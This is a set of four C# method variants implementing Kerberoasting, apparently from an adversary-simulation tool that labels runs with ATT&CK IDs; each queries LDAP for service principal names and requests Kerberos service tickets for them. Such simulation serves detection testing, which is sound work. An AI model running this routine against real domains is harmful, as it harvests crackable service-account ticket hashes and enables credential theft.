public static void Kerberoasting(string log, int sleep = 0) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1208"); //logger.TimestampInfo(String.Format("Starting T1208 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); } try { //NetworkCredential cred = null; List <String> spns; spns = Ldap.GetSPNs(); foreach (String spn in spns) { Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Kerberoasting(string log, int sleep) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1558.003"); if (sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", sleep)); } try { //NetworkCredential cred = null; List <String> spns; spns = Ldap.GetSPNs(); foreach (String spn in spns) { Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Kerberoasting(int sleep = 0) { Console.WriteLine("[*] Starting Kerberoast attack from {0}", Environment.MachineName); if (sleep > 0) { Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep); } //NetworkCredential cred = null; List <String> spns; spns = Ldap.GetSPNs(); foreach (String spn in spns) { SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", ""); if (sleep > 0) { Thread.Sleep(sleep * 1000); } } }
public static void Kerberoasting(PlaybookTask playbook_task, string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1558.003"); List <String> servicePrincipalNames; if (playbook_task.task_sleep > 0) { logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", playbook_task.task_sleep)); } try { logger.TimestampInfo(String.Format("Querying LDAP for Service Principal Names...")); servicePrincipalNames = Ldap.GetSPNs(); logger.TimestampInfo(String.Format("Found {0} SPNs", servicePrincipalNames.Count)); if (playbook_task.variation == 1) { logger.TimestampInfo(String.Format("Requesting a service ticket for all the {0} identified SPNs", servicePrincipalNames.Count)); foreach (String spn in servicePrincipalNames) { SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } logger.SimulationFinished(); } else if (playbook_task.variation == 2) { var random = new Random(); logger.TimestampInfo(String.Format("Requesting a service ticket for {0} random SPNs", playbook_task.user_target_total)); for (int i = 0; i < playbook_task.user_target_total; i++) { int index = random.Next(servicePrincipalNames.Count); SharpRoast.GetDomainSPNTicket(servicePrincipalNames[index].Split('#')[0], servicePrincipalNames[index].Split('#')[1], "", "", logger); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } logger.SimulationFinished(); } else if (playbook_task.variation == 3) { var random = new Random(); logger.TimestampInfo(String.Format("Requesting a service ticket for {0} defined SPNs", playbook_task.user_targets.Length)); foreach (string spn in playbook_task.user_targets) { SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger); if (playbook_task.task_sleep > 0) { Thread.Sleep(playbook_task.task_sleep * 1000); } } logger.SimulationFinished(); } } catch (Exception ex) { logger.SimulationFailed(ex); } }